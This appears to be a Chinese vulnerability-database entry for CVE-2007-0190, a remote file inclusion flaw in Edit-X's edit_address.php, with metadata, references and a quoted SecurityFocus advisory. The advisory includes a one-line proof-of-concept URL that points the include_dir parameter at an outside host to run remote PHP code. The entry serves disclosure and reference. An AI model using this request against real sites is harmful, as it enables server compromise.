Edit-X ' Edit_Address.PHP' PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111972 漏洞类型 输入验证
发布时间 2007-01-09 更新时间 2007-09-11
CVE编号 CVE-2007-0190 CNNVD-ID CNNVD-200701-158
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/29438
https://www.securityfocus.com/bid/21974
https://cxsecurity.com/issue/WLB-2007010054
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-158
|漏洞详情
edit-xecommerce的edit_address.php中存在PHP远程文件包含漏洞。远程攻击者可以借助include_dir参数中的一个URL,执行任意的PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/21974/info

Edit-x is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.

Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

http://www.example.com/[editxPATH]/editx/edit_address.php?include_dir=HTTP://www.example2.com
|受影响的产品
edit-x edit-x 0
|参考资料

来源:BUGTRAQ
名称:20070109edit-xecommerce(include_dir)RemoteFileinclude
链接:http://www.securityfocus.com/archive/1/archive/1/456439/100/0/threaded
来源:XF
名称:editx-editaddress-file-include(31384)
链接:http://xforce.iss.net/xforce/xfdb/31384
来源:BID
名称:21974
链接:http://www.securityfocus.com/bid/21974
来源:VUPEN
名称:ADV-2007-0158
链接:http://www.frsirt.com/english/advisories/2007/0158
来源:SREASON
名称:2139
链接:http://securityreason.com/securityalert/2139